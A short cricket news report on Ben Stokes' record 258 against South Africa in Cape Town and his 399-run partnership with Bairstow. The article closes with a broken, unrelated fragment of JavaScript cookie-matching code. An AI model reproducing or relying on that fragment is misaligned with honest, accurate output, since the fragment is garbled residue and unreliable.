England's Ben Stokes has absolutely destroyed the South African bowling attack to break all sorts of records in Cape Town.

Stokes hit the second fastest double century in Test cricket history and the fastest ever 250, reaching 200 off just 163 balls, and 250 off just 196 balls, before eventually being run out for 258 off just 198 balls, in an innings that included 30 fours and 11 sixes.

He resumed on day two on 74 not out from 93 deliveries, with England on 5-317.

He then blasted the Proteas' attack to all parts of the ground, scoring 130 runs in a singles session, to reach the lunch break unbeaten on 204 from just 167 deliveries.

He became the first English No.6 batsman to score a Test double century and he scored the most runs by an Englishman in a single session.

Stokes and No. 7 batsman Johnny Bairstow, who was unbeaten on 150 from 191 balls, also broke the record for the highest sixth wicket partnership in Test cricket history, sharing in a 399-run stand, before captain Alistair Cook declared on 6-629 after Stokes' dismissal.

The partnership also included the best run rate of any partnership of over 200 runs, as the pair scored at 6.91 runs per over. "(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,"\\$1")+"=([^;]*)"));(U[1]):"",();||void 0===time){/1e3+86400),.('')}
